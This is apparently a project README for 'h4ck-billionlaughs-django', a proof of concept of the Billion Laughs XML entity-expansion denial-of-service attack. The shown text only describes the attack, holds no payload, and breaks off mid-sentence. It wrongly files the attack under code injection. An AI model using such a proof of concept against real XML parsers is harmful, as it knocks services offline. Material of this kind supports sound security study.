h4ck-billionlaughs-django is an open source POC (Proof Of Concept) of one of the most dangerous attacks in the category of Code Injection, the Billion Laughs Attack.
The Billion Laughs attack is a denial-of-service attack that targets XML parsers. The Billion Laughs attack is also known as an XML bomb, or more esoterically, the exponential entity expansion attack. A Billion Laughs attack can occur even when using well-formed XML and can also pass XML schema validation. For this reason, it may sometimes be tricky to figure out how to mitigate the threat of the Billion Laughs attack when working with different XML parsers.
Make this ...